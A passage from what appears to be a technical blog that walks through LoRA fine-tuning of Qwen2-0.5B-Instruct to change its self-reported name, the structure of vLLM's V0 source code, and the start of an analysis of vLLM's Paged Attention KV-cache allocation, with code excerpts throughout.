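A = [[0.5] for _ in range(d)]   # d x r "down" projection (Gaussian in practice)
B = [[0.0] * d]                 # r x d "up" projection, initialized to zero

def rowvec_mat(x, M):
    # multiply a row vector x (1 x n) by a matrix M (n x m)
    return [sum(xi * M[i][j] for i, xi in enumerate(x)) for j in range(len(M[0]))]

x = [1.0, 2.0, 3.0, 4.0]
delta = rowvec_mat(rowvec_mat(x, A), B)          # the bypass output
y = [base + dl for base, dl in zip(rowvec_mat(x, W0), delta)]

assert y == x                # B starts at zero, so LoRA is a no-op at init
assert 2 * r * d < d * d     # trainable params: 8 vs 16 for full fine-tuning
```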
<h2> LoRA fine-tuning in practice </h2>
<p>Here we fine-tune the Qwen2-0.5B-Instruct model. Before fine-tuning, asking Qwen “你是谁?” (“Who are you?”) gives a perfectly normal answer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset
from peft import LoraConfig,TaskType,get_peft_model
from peft import PeftModel
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")
model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)
ipt = tokenizer("Human: {}\n{}".format("你是谁?", "").strip() + "\n\nAssistant: ", return_tensors="pt").to(model.device)
re = tokenizer.decode(model.generate(**ipt,max_length=256,do_sample=False)[0],skip_special_tokens=True)
print(re)
</code></pre></div></div>
<p><img src="/assets/img/loraintro/3.png" alt="" /></p>
<p>Prepare the data; in this example we use the following file:</p>
<p><a href="/assets/file/loraintro/id.json">id.json</a></p>
<p>The data is adapted from <a href="https://github.com/hiyouga/LLaMA-Factory/blob/bb0a37dc067e4385290644f165e3634dcbd88894/data/identity.json">here</a>; this training data makes the model report a name and vendor that we define. The contents of id.json look like:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
{
"instruction": "hi",
"input": "",
"output": "Hello! I am 小李, an AI assistant developed by 小张. How can I assist you today?"
},
{
"instruction": "hello",
"input": "",
"output": "Hello! I am 小李, an AI assistant developed by 小张. How can I assist you today?"
},
{
"instruction": "Who are you?",
"input": "",
"output": "I am 小李, an AI assistant developed by 小张. How can I assist you today?"
},
</code></pre></div></div>
<p>Next comes the LoRA fine-tuning itself, using the peft package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset,DatasetDict
from peft import LoraConfig,TaskType,get_peft_model
import torch

dataset = load_dataset('json',data_files='id.json',split='train')
dataset = dataset.train_test_split(test_size=0.1)

tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")

def process_fuc(one):
    MAX_LENGTH = 256
    input_ids,attention_mask,labels = [],[],[]
    instruction = tokenizer("\n".join(["Human: "+ one["instruction"],one["input"]]).strip() + "\n\nAssistant: ")
    response = tokenizer(one["output"] + tokenizer.eos_token)
    input_ids = instruction["input_ids"] + response["input_ids"]
    attention_mask = instruction["attention_mask"] + response["attention_mask"]
    labels = [-100] * len(instruction["input_ids"]) + response["input_ids"]
    if len(input_ids) > MAX_LENGTH:
        input_ids = input_ids[:MAX_LENGTH]
        attention_mask = attention_mask[:MAX_LENGTH]
        labels = labels[:MAX_LENGTH]
    return {
        "input_ids": input_ids,
        "attention_mask": attention_mask,
        "labels": labels
    }

tokenizer_dataset = dataset.map(process_fuc,remove_columns=dataset['train'].column_names)

model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)

loraconfig = LoraConfig(task_type=TaskType.CAUSAL_LM,target_modules=["q_proj", "k_proj", "v_proj",])
#loraconfig = LoraConfig(task_type=TaskType.CAUSAL_LM,target_modules=["q_proj", "k_proj", "v_proj", "o_proj", "gate_proj", "up_proj", "down_proj"],)

model = get_peft_model(model,loraconfig)

args = TrainingArguments(
    output_dir="./chatbot2",
    per_device_train_batch_size=1,
    logging_steps=10,
    num_train_epochs=10
)

trainer = Trainer(
    model=model,
    args=args,
    train_dataset=tokenizer_dataset['train'],
    data_collator=DataCollatorForSeq2Seq(tokenizer=tokenizer,padding=True),
)

trainer.train()
</code></pre></div></div>
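<p>One detail worth calling out from process_fuc above: the -100 labels follow the Hugging Face convention that positions labeled -100 are ignored by the cross-entropy loss, so the model is only trained to predict the assistant response, not the prompt. A small demo (the token ids are hypothetical):</p>

```python
prompt_ids = [101, 102, 103]      # hypothetical "Human: ..." token ids
response_ids = [201, 202]         # hypothetical answer token ids

# mask the prompt positions so the loss only covers the response
labels = [-100] * len(prompt_ids) + response_ids
trainable = [t for t in labels if t != -100]

assert labels == [-100, -100, -100, 201, 202]
assert trainable == response_ids
```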
<p>The number of training epochs is set to 10; if it is too small, the model’s behavior doesn’t seem to change.
On Colab with a GPU this takes less than a minute; on CPU it is slower, about 11 minutes.</p>
<p><img src="/assets/img/loraintro/4.png" alt="" /></p>
<p><img src="/assets/img/loraintro/5.png" alt="" /></p>
<p>On Colab the checkpoint here was 810; I’m not sure why it differs.</p>
<p>After fine-tuning, ask the model again; its output is now the data we defined.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from transformers import AutoTokenizer,AutoModelForCausalLM,DataCollatorForSeq2Seq,Trainer,TrainingArguments
from datasets import load_dataset
from peft import LoraConfig,TaskType,get_peft_model
from peft import PeftModel
tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2-0.5B-Instruct")
model = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2-0.5B-Instruct",low_cpu_mem_usage=True)
#model = model.cuda()
lora_model = PeftModel.from_pretrained(model, model_id="./chatbot2/checkpoint-500/")
ipt = tokenizer("Human: {}\n{}".format("你是谁?", "").strip() + "\n\nAssistant: ", return_tensors="pt").to(model.device)
re = tokenizer.decode(lora_model.generate(**ipt,max_length=256,do_sample=False)[0],skip_special_tokens=True)
print(re)
</code></pre></div></div>
<p><img src="/assets/img/loraintro/6.png" alt="" /></p>
<h2> Debugging LoRA </h2>
<p>Let’s take a quick look at how the fine-tuned model runs. After LoRA fine-tuning, the self-attention computation involves the two matrices A and B; here r is 8.</p>
<p><img src="/assets/img/loraintro/7.png" alt="" /></p>
<p>The core is here: when Qwen2 computes self-attention, the Linear used to compute q, k and v is the LoRA module’s Linear.</p>
<p><img src="/assets/img/loraintro/8.png" alt="" /></p>
<p>The multiplications of lora_A and lora_B with x below use exactly the A and B matrices trained by LoRA.</p>
<p><img src="/assets/img/loraintro/9.png" alt="" /></p>
<h2> LoRA in vLLM </h2>
<p>As you can see, the LoRA weights are all stored in that checkpoint directory.</p>
<p><img src="/assets/img/loraintro/10.png" alt="" /></p>
<p>So as long as the original model (Qwen2-0.5B-Instruct) and the fine-tuned weights are combined and fed into an inference framework, we get the fine-tuned behavior.
In vLLM, if a LoRA configuration is given, the Runner calls create_lora_manager when loading the model to replace the Runner’s model with the LoRA-wrapped model.</p>
<p><img src="/assets/img/loraintro/11.png" alt="" /></p>
<p><img src="/assets/img/loraintro/12.png" alt="" /></p>
<p><img src="/assets/img/loraintro/13.png" alt="" /></p>
<h2> Ref </h2>
<p>Fine-tuning data template from: <a href="https://www.cnblogs.com/KubeExplorer/p/18828441">LLM fine-tuning in practice: changing a model’s self-identity with LoRA</a></p>
<p>Code from: <a href="https://www.ethanzhang.xyz/2024/07/09/%E3%80%90%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2%E3%80%91%E4%BD%BF%E7%94%A8huggingface%E5%9C%A8%E5%8D%83%E9%97%AE2%E5%9F%BA%E7%A1%80%E4%B8%8A%E8%BF%9B%E8%A1%8CLora%E6%8C%87%E4%BB%A4%E5%BE%AE%E8%B0%83/">LoRA instruction fine-tuning on Qwen2 with Hugging Face’s PEFT library</a></p>
<p>Also referenced: <a href="https://www.zhihu.com/tardis/zm/art/623543497?source_id=1003">LoRA: lightweight fine-tuning of large models</a></p>
<p>Also referenced: <a href="https://zhuanlan.zhihu.com/p/646831196">Illustrated LLM fine-tuning: the LoRA low-rank adapter (theory)</a></p>
<h1> vLLM (V0) Source Code Structure Analysis (2025-06-08) — <a href="http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/06/08/vllm-code-overview">link</a> </h1>
<p>vLLM is typically used as follows (local inference, not serving):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
from vllm import LLM

llm = LLM(model="facebook/opt-125m")
outputs = llm.generate("Hello, my name is")
for output in outputs:
    prompt = output.prompt
    generated_text = output.outputs[0].text
    print(f"Prompt: {prompt!r}, Generated text: {generated_text!r}")
</code></pre></div></div>
<p>vLLM has a very clear class hierarchy; the overall relationships between the data structures are:</p>
<p><img src="/assets/img/vllmcodearch/1.png" alt="" /></p>
<p>This analysis is based on V0 and focuses on the relationships between the classes, mainly covering the two core paths: LLM() creating the model engine, and inference via llm.generate. In essence these are model loading and request handling. This post only covers the overall structure, using CPU execution as the example.</p>
<h2> Model loading </h2>
<p>The figure below shows the model loading flow: through the Executor and Worker layers, the ModelRunner layer finally starts loading the model.</p>
<p><img src="/assets/img/vllmcodearch/2.png" alt="" /></p>
<p>Finally, get_model in vllm/model_executor/model_loader/__init__.py does the actual model loading:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def get_model(*, vllm_config: VllmConfig) -> nn.Module:
    loader = get_model_loader(vllm_config.load_config)
    return loader.load_model(vllm_config=vllm_config)
</code></pre></div></div>
<p>Here loader is DefaultModelLoader by default. Its load_model function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def load_model(self, vllm_config: VllmConfig) -> nn.Module:
    device_config = vllm_config.device_config
    model_config = vllm_config.model_config
    target_device = torch.device(device_config.device)
    with set_default_torch_dtype(model_config.dtype):
        with target_device:
            model = _initialize_model(vllm_config=vllm_config)

        weights_to_load = {name for name, _ in model.named_parameters()}
        loaded_weights = model.load_weights(
            self.get_all_weights(model_config, model))
        self.counter_after_loading_weights = time.perf_counter()
        logger.info(
            "Loading weights took %.2f seconds",
            self.counter_after_loading_weights -
            self.counter_before_loading_weights)
        # We only enable strict check for non-quantized models
        # that have loaded weights tracking currently.
        if model_config.quantization is None and loaded_weights is not None:
            weights_not_loaded = weights_to_load - loaded_weights
            if weights_not_loaded:
                raise ValueError(
                    "Following weights were not initialized from "
                    f"checkpoint: {weights_not_loaded}")

        _process_weights_after_loading(model, model_config, target_device)

    return model.eval()
</code></pre></div></div>
<p>_initialize_model resolves the model architecture class and calls the model’s constructor, e.g. Qwen2ForCausalLM.__init__().</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _initialize_model(
    vllm_config: VllmConfig,
    *,
    prefix: str = "",
    model_class: Optional[type[nn.Module]] = None,
) -> nn.Module:
    """Initialize a model with the given configurations."""
    model_config = vllm_config.model_config
    if model_class is None:
        model_class, _ = get_model_architecture(model_config)

    if vllm_config.quant_config is not None:
        configure_quant_config(vllm_config.quant_config, model_class)

    signatures = inspect.signature(model_class.__init__)
    all_params = [param.name for param in signatures.parameters.values()]
    if "vllm_config" in all_params and "prefix" in all_params:
        # new-style model class
        with set_current_vllm_config(vllm_config, check_compile=True):
            return model_class(vllm_config=vllm_config, prefix=prefix)
    ...
</code></pre></div></div>
<p>model.load_weights then calls into the model's own weight-loading logic, which ultimately reaches AutoWeightsLoader's load_weights function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def load_weights(self, weights: Iterable[Tuple[str,
                                               torch.Tensor]]) -> Set[str]:
    loader = AutoWeightsLoader(
        self,
        skip_prefixes=(["lm_head."]
                       if self.config.tie_word_embeddings else None),
    )
    return loader.load_weights(weights)
</code></pre></div></div>
<p>The weights here come from self.get_all_weights(model_config, model); get_all_weights loads them from the safetensors files. The relevant call chain is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
DefaultModelLoader.get_all_weights
-->self._get_weights_iterator
-->self._prepare_weights
-->safetensors_weights_iterator
</code></pre></div></div>
<p>safetensors_weights_iterator opens the checkpoint files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def safetensors_weights_iterator(
    hf_weights_files: List[str],
    use_tqdm_on_load: bool,
) -> Generator[Tuple[str, torch.Tensor], None, None]:
    """Iterate over the weights in the model safetensor files."""
    for st_file in tqdm(
            hf_weights_files,
            desc="Loading safetensors checkpoint shards",
            disable=not enable_tqdm(use_tqdm_on_load),
            bar_format=_BAR_FORMAT,
    ):
        with safe_open(st_file, framework="pt") as f:
            for name in f.keys():  # noqa: SIM118
                param = f.get_tensor(name)
                yield name, param
</code></pre></div></div>
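<p>The iterator pattern above matters because weights are yielded lazily, one tensor at a time, instead of materializing every shard in memory. A pure-Python sketch of the same shape, with plain dicts standing in for the safetensors files:</p>

```python
from typing import Dict, Generator, Iterable, List, Tuple

def weights_iterator(
    shard_files: Iterable[Dict[str, List[float]]],
) -> Generator[Tuple[str, List[float]], None, None]:
    """Yield (name, tensor) pairs one at a time across all shards."""
    for shard in shard_files:  # stands in for safe_open(st_file)
        for name, tensor in shard.items():
            yield name, tensor

shards = [{"layer.0.weight": [1.0]}, {"layer.1.weight": [2.0]}]
names = [name for name, _ in weights_iterator(shards)]
# names == ["layer.0.weight", "layer.1.weight"]
```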
<h2> Request processing </h2>
<p>The request-handling flow is shown below:</p>
<p><img src="/assets/img/vllmcodearch/3.png" alt="" /></p>
<p>The core of the process is LLMEngine's step function. Its docstring is clear: step 1 picks out the seq groups to run in the next iteration, step 2 calls the executor to run inference, and step 3 processes the output.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def step(self) -> List[Union[RequestOutput, PoolingRequestOutput]]:
    """Performs one decoding iteration and returns newly generated results.

    .. figure:: https://i.imgur.com/sv2HssD.png
        :alt: Overview of the step function
        :align: center

        Overview of the step function.

    Details:
        - Step 1: Schedules the sequences to be executed in the next
          iteration and the token blocks to be swapped in/out/copy.
            - Depending on the scheduling policy,
              sequences may be `preempted/reordered`.
            - A Sequence Group (SG) refer to a group of sequences
              that are generated from the same prompt.
        - Step 2: Calls the distributed executor to execute the model.
        - Step 3: Processes the model output. This mainly includes:
            - Decodes the relevant outputs.
            - Updates the scheduled sequence groups with model outputs
              based on its `sampling parameters` (`use_beam_search` or not).
            - Frees the finished sequence groups.
        - Finally, it creates and returns the newly generated results.
    ...
    """
    ...
    # For llm_engine, there is no pipeline parallel support, so the engine
    # used is always 0.
    virtual_engine = 0
    ...
    if not self._has_remaining_steps(
            seq_group_metadata_list
    ) and not self._skip_scheduling_next_step:
        # Schedule iteration
        (seq_group_metadata_list, scheduler_outputs,
         allow_async_output_proc
         ) = self.scheduler[virtual_engine].schedule()

        ctx.seq_group_metadata_list = seq_group_metadata_list
        ctx.scheduler_outputs = scheduler_outputs
        ...
    if not scheduler_outputs.is_empty():
        # Check if we have a cached last_output from the previous iteration.
        # For supporting PP this is probably the best way to pass the
        # sampled_token_ids, as a separate broadcast over all the PP stages
        # will cause one virtual engine's microbatch to block the pipeline.
        last_sampled_token_ids = \
            self._get_last_sampled_token_ids(virtual_engine)

        execute_model_req = ExecuteModelRequest(
            seq_group_metadata_list=seq_group_metadata_list,
            blocks_to_swap_in=scheduler_outputs.blocks_to_swap_in,
            blocks_to_swap_out=scheduler_outputs.blocks_to_swap_out,
            blocks_to_copy=scheduler_outputs.blocks_to_copy,
            num_lookahead_slots=scheduler_outputs.num_lookahead_slots,
            running_queue_size=scheduler_outputs.running_queue_size,
            finished_requests_ids=finished_requests_ids,
            # We use ExecuteModelRequest to pass the last sampled_token_ids
            # to each of the non-last PP stages for in-place prepare_input.
            last_sampled_token_ids=last_sampled_token_ids)

        if allow_async_output_proc:
            execute_model_req.async_callback = self.async_callbacks[
                virtual_engine]

        try:
            outputs = self.model_executor.execute_model(
                execute_model_req=execute_model_req)
            self._skip_scheduling_next_step = False
        except InputProcessingError as e:
            ...

        # We need to do this here so that last step's sampled_token_ids can
        # be passed to the next iteration for PP.
        if self.scheduler_config.is_multi_step:
            self._update_cached_scheduler_output(virtual_engine, outputs)
    else:
        ...

    # Finish the current step for all the sequence groups.
    if self.scheduler_config.is_multi_step:
        for seq_group in seq_group_metadata_list:
            seq_group.finish_step()

    if not self._has_remaining_steps(seq_group_metadata_list):
        # clear the cache if we have finished all the steps.
        if self.scheduler_config.is_multi_step:
            self.cached_scheduler_outputs[0] = SchedulerOutputState()

        # is_first_step_output is True only when the num_steps of all
        # the sequences are 1. When the num_steps > 1,
        # multi_step_model_runner does the first-step output append.
        is_first_step_output: bool = False if not seq_group_metadata_list \
            else seq_group_metadata_list[0].state.num_steps == 1

        # Add results to the output_queue
        ctx.append_output(outputs=outputs,
                          seq_group_metadata_list=seq_group_metadata_list,
                          scheduler_outputs=scheduler_outputs,
                          is_async=allow_async_output_proc,
                          is_last_step=True,
                          is_first_step_output=is_first_step_output)
        ...
    else:
        # Multi-step case
        return ctx.request_outputs

    if not self.has_unfinished_requests():
        # Drain async postprocessor (if exists)
        if len(ctx.output_queue) > 0:
            self._process_model_outputs(ctx=ctx)
        assert len(ctx.output_queue) == 0

        # Stop the execute model loop in parallel workers until there are
        # more requests to process. This avoids waiting indefinitely in
        # torch.distributed ops which may otherwise timeout, and unblocks
        # the RPC thread in the workers so that they can process any other
        # queued control plane messages, such as add/remove lora adapters.
        logger.debug("Stopping remote worker execution loop.")
        self.model_executor.stop_remote_worker_execution_loop()

    return ctx.request_outputs
</code></pre></div></div>
<p>Here we only discuss the execution of inference. The call goes one layer down to the executor's execute_model, passing an ExecuteModelRequest whose seq_group_metadata_list carries the data of the scheduled seq groups.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
outputs = self.model_executor.execute_model(
    execute_model_req=execute_model_req)
</code></pre></div></div>
<p>The executor is just a middleman that calls the Worker's execute_model. That function calls the Worker's prepare_input to build the model inputs, then hands them to the Runner's execute_model to carry out one inference pass.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class LocalOrDistributedWorkerBase(WorkerBase):
    ...
    def execute_model(
        self,
        execute_model_req: Optional[ExecuteModelRequest] = None,
    ) -> Optional[List[SamplerOutput]]:
        """Executes at least one model step on the given sequences, unless no
        sequences are provided."""
        start_time = time.perf_counter()
        inputs = self.prepare_input(execute_model_req)
        if inputs is None:
            return None
        model_input, worker_input, kwargs = inputs
        num_steps = worker_input.num_steps
        if (execute_model_req is not None and execute_model_req.spec_step_idx):
            kwargs["spec_step_idx"] = execute_model_req.spec_step_idx

        self.execute_worker(worker_input)

        # If there is no input, we don't need to execute the model.
        if worker_input.num_seq_groups == 0:
            return []

        intermediate_tensors = None
        orig_model_execute_time = 0.0
        ...
        output = self.model_runner.execute_model(
            model_input=model_input,
            kv_caches=self.kv_cache[worker_input.virtual_engine]
            if self.kv_cache is not None else None,
            intermediate_tensors=intermediate_tensors,
            num_steps=num_steps,
            **kwargs,
        )

        model_execute_time = time.perf_counter() - start_time
        if not get_pp_group().is_last_rank:
            # output is IntermediateTensors
            assert isinstance(output, IntermediateTensors)
            if (self.observability_config is not None
                    and self.observability_config.collect_model_execute_time):
                output.tensors["model_execute_time"] = torch.tensor(
                    model_execute_time + orig_model_execute_time)
            get_pp_group().send_tensor_dict(output.tensors,
                                            all_gather_group=get_tp_group())
            return [None]
        if (self.observability_config is not None
                and self.observability_config.collect_model_execute_time
                and output is not None):
            for o in output:
                o.model_execute_time = (orig_model_execute_time +
                                        model_execute_time)

        # output is List[SamplerOutput]
        return output
</code></pre></div></div>
<p>execute_model in the Runner (here CPUModelRunner) invokes the model's forward pass. The call to set_forward_context associates the attention metadata with this inference step; model_executable (the forward call) is then invoked, which lands in the forward function of the actual model (e.g. Qwen2ForCausalLM).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def execute_model(
    self,
    model_input: ModelInputForCPUWithSamplingMetadata,
    kv_caches: List[torch.Tensor],
    intermediate_tensors: Optional[IntermediateTensors] = None,
    num_steps: int = 1,
    previous_hidden_states: Optional[torch.Tensor] = None,
) -> Optional[List[SamplerOutput]]:
    ...
    model_executable = self.model
    ...
    with set_forward_context(model_input.attn_metadata, self.vllm_config,
                             model_input.virtual_engine):
        hidden_states = model_executable(
            input_ids=model_input.input_tokens,
            positions=model_input.input_positions,
            intermediate_tensors=intermediate_tensors,
            **execute_model_kwargs,
            **multimodal_kwargs,
        )

    # Compute the logits.
    logits = self.model.compute_logits(hidden_states,
                                       model_input.sampling_metadata)

    # Only perform sampling in the driver worker.
    if not self.is_driver_worker:
        return []

    # Sample the next token.
    output = self.model.sample(
        logits=logits,
        sampling_metadata=model_input.sampling_metadata,
    )
    if self.return_hidden_states:
        # we only need to pass hidden states of most recent token
        if model_input.is_prompt:
            output.prefill_hidden_states = hidden_states
        output.hidden_states = hidden_states
    return [output]
</code></pre></div></div>
Analysis of Paged Attention in vLLM2025-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2025/06/02/vllm-paged-attn
<h2> Basic concepts </h2>
<p>The previous article introduced the KV cache and its role. Because the KV cache brings a large performance gain to inference, every inference framework now supports it. This article analyzes the implementation of Paged Attention, the core mechanism of vLLM. It does not cover vLLM's basic principles or its overall source architecture (I hope to write about those in the future), so readers are assumed to be familiar with the basic LLM inference process and vLLM's code layout. <a href="https://zhuanlan.zhihu.com/p/691038809">图解大模型计算加速系列之:vLLM核心技术PagedAttention原理</a> is a good introduction to the principles behind vLLM's Paged Attention.</p>
<p>An important part of inference is computing self-attention among tokens. The KV cache stores the K and V values of earlier tokens, which are reused when computing the current token. The core idea of vLLM's Paged Attention is to manage the KV cache the way an operating system manages virtual memory: KV-cache blocks are allocated dynamically, which raises memory utilization. This article analyzes that mechanism; simply put, it walks through the implementation of the figure below at the code level.</p>
<p><img src="/assets/img/vllmpageattn/1.png" alt="" /></p>
<p>Specifically, this article covers:</p>
<ul>
<li>Physical block allocation</li>
<li>Virtual block management</li>
<li>How the KV cache is used</li>
</ul>
<p>The analysis is based on vLLM's CPU implementation.
A Block is analogous to an OS page: a page manages a fixed number of bytes (typically 4096), and a Block manages the KV values of a fixed number of tokens. In the figure above a Block holds the KV of 4 tokens; in practice it is usually somewhat larger.</p>
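<p>Under this analogy, the number of blocks a sequence needs is just a ceiling division, the same way a file's size in pages is computed. A small sketch (block_size 4 as in the figure):</p>

```python
def num_blocks_needed(num_tokens: int, block_size: int) -> int:
    """Ceiling division: how many KV-cache blocks a sequence occupies."""
    return -(-num_tokens // block_size)

assert num_blocks_needed(9, 4) == 3   # 2 full blocks + 1 partial tail
assert num_blocks_needed(8, 4) == 2   # exactly full
```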
<h2> Physical block allocation </h2>
<p>Just as OS pages are set up at system initialization with each page assigned a pfn, physical blocks are allocated when the vLLM engine initializes, and each physical block's id is its index in the array. In the vLLM figure below, the left half can be viewed as virtual block management and the right half as physical block management (essentially space allocation and swap in/out); the right half omits the executor, perhaps because the author considered it unimportant.</p>
<p><img src="/assets/img/vllmpageattn/2.png" alt="" /></p>
<p>The KV cache initialization flow is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>LLMEngine.__init__
-->self._initialize_kv_caches(LLMEngine._initialize_kv_caches)
-->self.model_executor.determine_num_available_blocks
-->self.model_executor.initialize_cache
-->self.collective_rpc("initialize_cache")
-->CPUWorker.initialize_cache
-->self._init_cache_engine(CPUWorker._init_cache_engine)
-->CPUCacheEngine.__init__
-->get_attn_backend
-->self._allocate_kv_cache(CPUCacheEngine._allocate_kv_cache)
-->self.attn_backend.get_kv_cache_shape
-->kv_cache.append
-->bind_kv_cache
-->layer_cache.fill_(0)
</code></pre></div></div>
<p>self.model_executor.determine_num_available_blocks decides the total number of physical blocks (analogous to the total number of pages in an OS), namely num_gpu_blocks and num_cpu_blocks.</p>
<p>The physical blocks, i.e. the KV cache storage, are created in CPUWorker's _init_cache_engine function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _init_cache_engine(self) -> None:
    self.cache_engine = [
        CPUCacheEngine(self.cache_config, self.model_config,
                       self.parallel_config, self.device_config)
        for _ in range(self.parallel_config.pipeline_parallel_size)
    ]
    self.cpu_cache = [
        self.cache_engine[ve].cpu_cache
        for ve in range(self.parallel_config.pipeline_parallel_size)
    ]
    bind_kv_cache(self.compilation_config.static_forward_context,
                  self.cpu_cache)
    self.model_runner.block_size = self.cache_engine[0].block_size

    assert all(
        self.cpu_cache[ve] is not None
        for ve in range(self.parallel_config.pipeline_parallel_size))

    # Populate the cache to warmup the memory
    for ve in range(self.parallel_config.pipeline_parallel_size):
        for layer_cache in self.cpu_cache[ve]:
            layer_cache.fill_(0)
</code></pre></div></div>
<p>CPUCacheEngine is the core class for managing physical blocks. The first part of its constructor, shown below, initializes the relevant fields: head_size is the per-head dimension of the attention mechanism and num_heads the number of KV heads; every layer has its own KV cache, hence num_layers is fetched; block_size is the number of tokens whose KV each block stores; num_cpu_blocks is the total CPU block count obtained earlier.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class CPUCacheEngine:
    """Manages the KV cache for CPU backend.

    This class is responsible for initializing and managing CPU KV
    caches. It also provides methods for performing KV cache operations, such
    as copying.
    """

    def __init__(self, cache_config: CacheConfig, model_config: ModelConfig,
                 parallel_config: ParallelConfig,
                 device_config: DeviceConfig) -> None:
        assert device_config.device_type == "cpu"
        self.cache_config = cache_config
        self.model_config = model_config
        self.parallel_config = parallel_config

        self.head_size = model_config.get_head_size()
        self.num_layers = model_config.get_num_layers(parallel_config)
        self.num_heads = model_config.get_num_kv_heads(parallel_config)

        self.block_size = cache_config.block_size
        # Note: In CacheConfig, num_gpu_blocks actual is num_cpu_blocks
        # for CPU backend, because we want to reuse KV cache management
        # in the scheduler.
        self.num_cpu_blocks = cache_config.num_gpu_blocks

        if cache_config.cache_dtype == "auto":
            self.dtype = model_config.dtype
        elif cache_config.cache_dtype in ["fp8", "fp8_e5m2"]:
            self.dtype = torch.float8_e5m2
        else:
            raise NotImplementedError(f"Unsupported KV cache type "
                                      f"{cache_config.cache_dtype}.")

        # Get attention backend.
        self.attn_backend = get_attn_backend(
            self.model_config.get_head_size(),
            self.model_config.dtype,
            cache_config.cache_dtype,
            self.block_size,
            self.model_config.is_attention_free,
            use_mla=self.model_config.use_mla,
        )

        # Initialize the cache.
        self.cpu_cache = self._allocate_kv_cache(self.num_cpu_blocks)
</code></pre></div></div>
<p>The second part of CPUCacheEngine.__init__ obtains the backend class that implements the attention computation, in this example TorchSDPABackend. The final part calls self._allocate_kv_cache, which performs the actual physical block allocation.</p>
<p>Let's look at the implementation of _allocate_kv_cache:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
def _allocate_kv_cache(
    self,
    num_blocks: int,
) -> List[torch.Tensor]:
    """Allocates KV cache on CPU."""
    kv_cache_shape = self.attn_backend.get_kv_cache_shape(
        num_blocks, self.block_size, self.num_heads, self.head_size)
    kv_cache: List[torch.Tensor] = []
    for _ in range(self.num_layers):
        kv_cache.append(
            torch.empty(kv_cache_shape, dtype=self.dtype, device="cpu"))
    return kv_cache
</code></pre></div></div>
<p>The call to self.attn_backend.get_kv_cache_shape returns the shape of the KV cache; TorchSDPABackend simply delegates to PagedAttention.get_kv_cache_shape.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
class TorchSDPABackend(AttentionBackend):
    ...
    @staticmethod
    def get_kv_cache_shape(
        num_blocks: int,
        block_size: int,
        num_kv_heads: int,
        head_size: int,
    ) -> Tuple[int, ...]:
        return PagedAttention.get_kv_cache_shape(num_blocks, block_size,
                                                 num_kv_heads, head_size)


class _PagedAttention:
    ...
    @staticmethod
    def get_kv_cache_shape(
        num_blocks: int,
        block_size: int,
        num_kv_heads: int,
        head_size: int,
        *args,
    ) -> Tuple[int, ...]:
        return (2, num_blocks, block_size * num_kv_heads * head_size)
</code></pre></div></div>
<p>kv_cache_shape is a tuple describing the storage layout of the KV cache. The 2 means one plane each for K and V, num_blocks is the number of blocks, and block_size * num_kv_heads * head_size is the size of each block: block_size is the token count, and num_kv_heads * head_size is the number of elements stored per token. A token's K or V vector has the same dimension as the word embedding, which in multi-head attention equals num_kv_heads * head_size.</p>
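<p>Plugging in concrete numbers makes the layout tangible. A sketch with an illustrative toy configuration (the values below are not taken from any real model):</p>

```python
def kv_cache_shape(num_blocks, block_size, num_kv_heads, head_size):
    # Mirrors _PagedAttention.get_kv_cache_shape: K and V planes, then
    # num_blocks blocks, each holding block_size tokens of
    # num_kv_heads * head_size elements.
    return (2, num_blocks, block_size * num_kv_heads * head_size)

shape = kv_cache_shape(num_blocks=1024, block_size=16,
                       num_kv_heads=8, head_size=64)
assert shape == (2, 1024, 16 * 8 * 64)
# Per-layer element count: 2 * 1024 * 8192 = 16_777_216 elements.
```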
<p>Back in CPUCacheEngine._allocate_kv_cache: once kv_cache_shape is obtained, an empty tensor is allocated for each layer. The overall physical KV cache layout is shown below; the physical blocks get their storage here, and later use simply treats them as sequentially laid-out blocks (like pages in Linux).</p>
<p><img src="/assets/img/vllmpageattn/3.png" alt="" /></p>
